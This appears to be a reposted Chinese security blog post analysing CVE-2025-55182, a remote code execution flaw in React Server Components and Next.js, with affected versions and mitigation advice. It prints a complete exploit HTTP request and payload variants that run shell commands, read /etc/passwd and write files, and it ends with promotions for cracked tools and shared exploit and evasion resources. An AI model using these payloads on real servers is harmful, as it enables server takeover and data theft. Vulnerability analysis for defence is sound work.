文章总结: CVE-2025-55182是影响React19.x和Next.js多版本的高危漏洞,CVSS评分10.0。漏洞源于react-server-dom-webpack的ServerActions功能对客户端表单数据校验缺失,允许攻击者通过特制HTTPPOST请求在服务器执行任意代码。受影响版本包括React19.x全系列和Next.js15.x-16.x(AppRouter模式)。文章提供了漏洞复现的请求包示例和临时防护措施,包括WAF拦截和关闭外网开发服务。
综合评分: 89
文章分类: 漏洞分析,漏洞预警,WEB安全,应用安全
CVE-2025-55182 漏洞复现与修复 涉及 React 19.x 及 Next.js 多版本
原创
漏洞复现Tony
渗透安全HackTwo
2025年12月4日 12:52
广东
0x01 前言
最近React/Next.js 生态爆出高危漏洞——CVE-2025-55182(React Server Components 远程代码执行)及衍生漏洞 CVE-2025-66478(Next.js 版本),一经披露便引发安全圈震动。该漏洞 CVSS 评分拉满至 10.0,攻击者仅需发送一条特制 HTTP POST 请求,就能绕过认证在服务器执行任意命令、读写敏感文件,甚至完全接管整台服务器。更棘手的是,漏洞影响范围极广:React Server 19.x 全系列、Next.js 15.x-16.x(App Router 模式)均在受影响名单内,而 Next.js 作为前端主流框架,其应用遍布各类 Web 服务,一旦被武器化,后果不堪设想。本文将从漏洞原理、复现实操、修复方案三方面展开,帮开发者和运维人员快速避险。
POC在末尾下载
声明
请自行搭建环境进行漏洞测试,该公众号或作者星球分享的工具、项目、漏洞仅供安全研究与学习之用请勿用于非法行为,如用于其他用途,由使用者承担全部法律及连带责任,与作者和本公众号无关。
TIPS:末尾领取资料及福利-批量检测脚本在末尾
0x02 漏洞核心详情
漏洞根源在于react-server-dom-webpack的Server Actions 功能对客户端提交的表单数据校验缺失。React 在解析 Flight 协议传输的请求数据时,存在不安全的反序列化逻辑,攻击者可构造恶意请求,直接调用 Node.js 内置模块(如child_process、fs),从而实现远程代码执行。
而 Next.js 15.x-16.x 版本因依赖存在缺陷的 React 服务端 DOM 包,且默认启用 App Router 模式,导致其应用 “被动” 继承该漏洞,无需额外配置即可被利用。
受影响版本
React 相关
- react-server-dom-webpack/parcel/turbopack:19.0.0、19.0.1(早期补丁未全覆盖)、19.1.*、19.2.0
Next.js 相关
- v15.0.0~v15.0.4、v15.1.0~v15.1.8、v15.2.x~v15.5.6、v16.0.0~v16.0.6
- v14.3.0-canary.77 及以上尝鲜版本(启用 App Router)
0x04 漏洞复现
request packet
POST /formaction HTTP/1.1Host: Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Connection: keep-aliveContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryTKdCHxrnaisI8JRHContent-Length: 379------WebKitFormBoundaryTKdCHxrnaisI8JRHContent-Disposition: form-data; name="$ACTION_REF_0"------WebKitFormBoundaryTKdCHxrnaisI8JRHContent-Disposition: form-data; name="$ACTION_0:0"{ "id": "vm#runInThisContext", "bound": ["global.process.mainModule.require(\"child_process\").execSync(\"whoami\").toString()"]}------WebKitFormBoundaryTKdCHxrnaisI8JRH--
利用变种(覆盖多场景)
除了执行系统命令,还可实现文件读写等操作:
读取敏感文件:{"id":"fs#readFileSync", "bound":["/etc/passwd"]}写入后门文件:{"id":"fs#writeFileSync", "bound":["/tmp/pwned.txt", "CVE-2025-55182"]}无文件命令执行:{"id":"child_process#execSync", "bound":["whoami"]}
0x05 修复建议
临时防护措施(无法立即升级时)
-
云平台防护
Vercel、Cloudflare 等平台已后台部署防护规则,可优先迁移或开启防护;
-
WAF 拦截
配置 Web 应用防火墙,拦截包含
$ACTION_REF_0、vm#runInThisContext等特征的恶意请求; -
关闭外网开发服务
禁止本地开发模式的 React/Next.js 服务暴露至公网,仅保留内网访问权限。
内部星球VIP介绍V1.4(更多未公开挖洞技术欢迎加入星球)
如果你想学习更多另类渗透SRC挖洞技术/攻防/免杀/应急溯源/赏金赚取/工作内推,欢迎加入我们内部星球可获得内部工具字典和享受内部资源/内部群🔥
🚀1.每周更新1day/0day漏洞刷分上分,目前已更新至4893+;
🧰2.包含网上的各种付费工具/各种Burp漏洞检测插件/fuzz字典等等;
🧩3.Fofa/Ctfshow/360Quake/Shadon/零零信安/Zoomeye各种账号高级VIP会员共享等等;
🎥4.最新SRC挖掘/红队/代审/免杀/逆向视频资源等等;
🧪5.内部自动化漏扫赚赏金捡洞工具,免杀CS/Webshell工具等等;
🎯6.最新0Day1Day漏洞POC/EXP分享地址(同步更新);
https://t.zsxq.com/s8GRo
🔥7.详情直接点击下方链接进入了解,后台回复” 星球 “获取优惠先到先得!后续资源会更丰富在加入还是低价!(即将涨价)以上仅介绍部分内容还没完!点击下方地址全面了解👇🏻
👉点击了解加入–>>2025内部VIP星球福利介绍V1.4版本-1day/0day漏洞库及内部资源更新
结尾
免责声明
获取方法
回复“app” 获取 app渗透和app抓包教程
回复“渗透字典” 获取 针对一些字典重新划分处理,收集了几个密码管理字典生成器用来扩展更多字典的仓库。
回复“书籍” 获取 网络安全相关经典书籍电子版pdf
压缩包解压密码:HackTwo
免责声明
文章中的案例或工具仅面向合法授权的企业安全建设行为,如您需要测试内容的可用性,请自行搭建靶机环境,勿用于非法行为。如用于其他用途,由使用者承担全部法律及连带责任,与作者和本公众号无关。本项目所有收录的poc均为漏洞的理论判断,不存在漏洞利用过程,不会对目标发起真实攻击和漏洞利用。文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用。如您在使用本工具或阅读文章的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任。本工具或文章或来源于网络,若有侵权请联系作者删除,请在24小时内删除,请勿用于商业行为,自行查验是否具有后门,切勿相信软件内的广告!
往期推荐
最新xray1.9.11高级版下载Windows/Linux
最新HCL AppScan Standard 10.4.128273破解版下载
渗透安全HackTwo
微信号:关注公众号获取
后台回复星球加入:知识星球
扫码关注 了解更多
喜欢的朋友可以点赞转发支持一下
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:渗透安全HackTwo 漏洞复现Tony《CVE-2025-55182 漏洞复现与修复 涉及 React 19.x 及 Next.js 多版本》